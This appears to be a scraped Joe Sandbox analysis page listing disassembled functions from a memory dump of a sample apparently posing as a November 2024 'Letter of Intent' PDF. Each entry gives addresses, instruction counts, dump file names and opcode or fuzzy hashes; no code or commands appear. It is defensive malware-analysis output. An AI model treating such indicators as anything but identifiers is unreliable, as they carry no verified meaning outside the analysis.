                                                                                      • Instruction ID: 676f8ea29f465ce16331a8cdd3132d9649c13a1d2d5d73a817bdd0859490feda
                                                                                      • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                      • Instruction Fuzzy Hash: E901A175B0060ABB9B04DAA6DA44CAF7BBCEF85B94F0100A9A911C3201F770EF01CB70
                                                                                      Function 32F87330 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9df7216eba016aee368ef4dafba284e948e86b5b2a993a45ce1a9b8874c9e23d
                                                                                      • Instruction ID: cf9df32ffc538bf97645abfb837c29bb186b44808be4cfda76fe6e89b09fe4bd
                                                                                      • Opcode Fuzzy Hash: 9df7216eba016aee368ef4dafba284e948e86b5b2a993a45ce1a9b8874c9e23d
                                                                                      • Instruction Fuzzy Hash: C011707A6007249FE711CF55C851B5BB7E8EF84358F014C29EA85CB210DB75EC41DBA2
                                                                                      Function 32FBF2D0 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ae2264ce2aae25a447d93e4db6fd0879ea91f97ded9a6f097c98b5a427eba04
                                                                                      • Instruction ID: ee14846558057985b9c8a4055ed9e00ff0abd59a69fa5ecab858d1356d5a4e38
                                                                                      • Opcode Fuzzy Hash: 9ae2264ce2aae25a447d93e4db6fd0879ea91f97ded9a6f097c98b5a427eba04
                                                                                      • Instruction Fuzzy Hash: 2911C2B6B007489BD710CFA9C944B9EB7E8EF44700F5808B6EA05EB251DA79D901CB50
                                                                                      Function 330272A0 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                      • Instruction ID: eccdc46965e6b24c6f3d5ca730c40672b209275a1661005a59a51265b189a3a9
                                                                                      • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                      • Instruction Fuzzy Hash: 66019EB6140509BFD7119F62CC90E62FBBEFF94791F440925F250865A1C7A1ECA1CBE4
                                                                                      Function 32F89A40 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d524ad5be741dca8eeaebd7f82f985cac4802be9f955332c5109626d41edfb4
                                                                                      • Instruction ID: ff5c2d888e8f5aaa3af1c5ed560792be73a435827e79b0b8e35abe3ab46cc387
                                                                                      • Opcode Fuzzy Hash: 3d524ad5be741dca8eeaebd7f82f985cac4802be9f955332c5109626d41edfb4
                                                                                      • Instruction Fuzzy Hash: 8601B172241314AFD3218A21CC54E56B7AEEB817A0F25892AE7298B780DA71DC01CBD0
                                                                                      Function 3303B450 Relevance: .0, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                      • Instruction ID: d97506283931ee83aaa815bf91cf4ba9d3176ac31be62acb05f1654eddb68a06
                                                                                      • Opcode Fuzzy Hash: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                      • Instruction Fuzzy Hash: BC01B536142650BFD3228F45CE50F16BBA9FB52B64F550450BA815BAB0C3A5E890CB84
                                                                                      Function 3304FB0C Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9b1dc1b105aa6ba71b88e9e8f439b1c0d0b3a94c4798331be269ca73659da60
                                                                                      • Instruction ID: 1e4b87fda7d496d4b8e815c6a8bc0aef3c2c771405779fe7dc3e4a6814283a2b
                                                                                      • Opcode Fuzzy Hash: a9b1dc1b105aa6ba71b88e9e8f439b1c0d0b3a94c4798331be269ca73659da60
                                                                                      • Instruction Fuzzy Hash: 1A116171A00348ABCB00DFA9D855E9EBBF8EF44740F444466B900EB390DA74DA01CB90
                                                                                      Function 32F89353 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                      • Instruction ID: d68d0e2a64a698af0ad0a8c2561090a69d418356463e6af7c05156a0ade6b87a
                                                                                      • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                      • Instruction Fuzzy Hash: F511AD72910B01DFE3228F15C880B12B3E9FF407A6F158C6CEA994B6A6C775E880CB50
                                                                                      Function 32FB33A5 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                      • Instruction ID: e0527e17952072b2135801d625867c9e637ad3a868e8eb8dced41b20cb2ac2f2
                                                                                      • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                      • Instruction Fuzzy Hash: 6B01D672740215E7CF068A9BDE40E9B3B6C9F84784F100829BB06D7160EEB0DD41C760
                                                                                      Function 32FCD1D0 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                      • Instruction ID: 1274ef70627e684446c905235b6e51b3083552dc86dcae09011c980fa34d7364
                                                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                      • Instruction Fuzzy Hash: 540142B6A003169BE7058A54E800F9D73A9EFC4B38F14895AFF208B288DF74D840CB81
                                                                                      Function 3304F5BE Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2dbbd352a7919e53594da01e6888f5c431dfb027faaebd3b8b8492b277de2b8
                                                                                      • Instruction ID: dbd055b06517cee106a2bbee9d5360027294a1a995ec838e4c3faa2865883617
                                                                                      • Opcode Fuzzy Hash: b2dbbd352a7919e53594da01e6888f5c431dfb027faaebd3b8b8492b277de2b8
                                                                                      • Instruction Fuzzy Hash: 65017171A00348EFDB04DFA9D855FAEBBF8EF44700F444466BA00EB290DAB4DA01CB95
                                                                                      Function 3304F453 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f130e80e173a05c979de967f1e54141ec3a6cffadc93af2a88e0010f9473560
                                                                                      • Instruction ID: 88bcfae8f169a89e6eb653d8264ef67ed1876f7820c2ba3961ff5f07f960b3d6
                                                                                      • Opcode Fuzzy Hash: 0f130e80e173a05c979de967f1e54141ec3a6cffadc93af2a88e0010f9473560
                                                                                      • Instruction Fuzzy Hash: 01015271A10248ABDB04DFA9D845FAEBBB8EF44710F444466BA00EB281DAB4DA01CB94
                                                                                      Function 3304FA02 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31bc1d16340ea84d680b9fad651e5b6de729f34d811b314e58f36d429fcc10ba
                                                                                      • Instruction ID: d75256dbab1b2dd6cd8f0631902b545faa3fe9b7a63dabadfed08d824548c78f
                                                                                      • Opcode Fuzzy Hash: 31bc1d16340ea84d680b9fad651e5b6de729f34d811b314e58f36d429fcc10ba
                                                                                      • Instruction Fuzzy Hash: 480171B1A11348EBDB04DFA9D855FAEBBF8EF44750F444466B940EB380DAB4DA01CB94
                                                                                      Function 3304FA87 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e355694cc3f33610a8e4499b16afd4f4fb9f184dcc066dfa28e9dcfe3990eff
                                                                                      • Instruction ID: 57761449af3537e98e51d3c36f948676b87a98e73c50414d191321abdcb7e114
                                                                                      • Opcode Fuzzy Hash: 1e355694cc3f33610a8e4499b16afd4f4fb9f184dcc066dfa28e9dcfe3990eff
                                                                                      • Instruction Fuzzy Hash: 9E0171B1A41348ABDB04DFA9D845FAFBBF8EF44710F444466B940EB380DAB4DA01CB95
                                                                                      Function 3304F367 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee46a9cbc66a064148fa36eebbda4aee77393e40e047c5ac5408e80621a97774
                                                                                      • Instruction ID: 8cdf961bcc03129ea8acd81c2cf437587b582f23017314e11efe6394c656a83c
                                                                                      • Opcode Fuzzy Hash: ee46a9cbc66a064148fa36eebbda4aee77393e40e047c5ac5408e80621a97774
                                                                                      • Instruction Fuzzy Hash: AB018471A00358EBD700DBA5D815FAFBBB8EF44700F444466B500EB280EAB4DA01CB94
                                                                                      Function 33033370 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                      • Instruction ID: 53f37ae4fefacab7992b9b6ab6edafa5c2232bb7dc3f3d75dd1b874e1aae538f
                                                                                      • Opcode Fuzzy Hash: ed034e48ead1e6b79cc9206741e1bdfe31b1bc05f27bdd404418cb4b64f8afe9
                                                                                      • Instruction Fuzzy Hash: 39114C75640A84CFC375CB04C590FA5B7A1EB88B20F14887CD54E8BB80CF79A846DF90
                                                                                      Function 3305972B Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                      Function 33065636 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc0a213a8e4d5fe2c50ea61406177969988b5ed1229e0cc85574cb95d96d0fa1
                                                                                      • Instruction ID: 54e73052fc99994a48b9c59d02927478e633096c30ab9b38a72d7dcb63520af4
                                                                                      • Opcode Fuzzy Hash: fc0a213a8e4d5fe2c50ea61406177969988b5ed1229e0cc85574cb95d96d0fa1
                                                                                      • Instruction Fuzzy Hash: 5E118074D00249EFCB04DFA8D444A9EB7B4EF08704F14845AB915EB350E774DA02CB64
                                                                                      Function 33065152 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9db5735ec078086b31dfa0ce29edc39258380481b01992e90fd25834212b9be
                                                                                      • Instruction ID: 1ca70119e09da0748860c77faabca3cfff165d28fc242865074597299e8bbe3c
                                                                                      • Opcode Fuzzy Hash: d9db5735ec078086b31dfa0ce29edc39258380481b01992e90fd25834212b9be
                                                                                      • Instruction Fuzzy Hash: 71012CB1A1120DABDB00DFA9D9559DEBBF8EF48704F14445AFA00FB350D674AA018BA4
                                                                                      Function 33065060 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cedbd0750c7d5355cf606850b23bc6135d478124dd85ff9c46637b5a4a32e0f
                                                                                      • Instruction ID: 93214002a1222ff4e205d922f6221bd28c73a55ebb7b232a0cfe53735ee79538
                                                                                      • Opcode Fuzzy Hash: 3cedbd0750c7d5355cf606850b23bc6135d478124dd85ff9c46637b5a4a32e0f
                                                                                      • Instruction Fuzzy Hash: 6F017CB1A0030CABDB00DFA9D9419EEB7F8EF48304F10445AFA00F7341D674EA018BA4
                                                                                      Function 330650D9 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fdbb6fc9670470acd9e627589b34635c4f6f898836dcc45c39db362de83d5ca
                                                                                      • Instruction ID: 1ae345d20d0d9f59bddad70d9abea986210a51a626b5eb0578108e4d320bea43
                                                                                      • Opcode Fuzzy Hash: 0fdbb6fc9670470acd9e627589b34635c4f6f898836dcc45c39db362de83d5ca
                                                                                      • Instruction Fuzzy Hash: 56012CB1A0020DABDB00DFA9D9459DEB7F8EF48744F54445AFA00FB390DA74AA018BA4
                                                                                      Function 32FC5734 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction ID: 325c693325975c4101251344699219d3b7f708a28cea483c337057d0edcb6dd2
                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction Fuzzy Hash: C4F0AF72A01629AFE319CF5CC980F6ABBEDEF45694F014079DA01EF271E671DE04CA94
                                                                                      Function 33065537 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
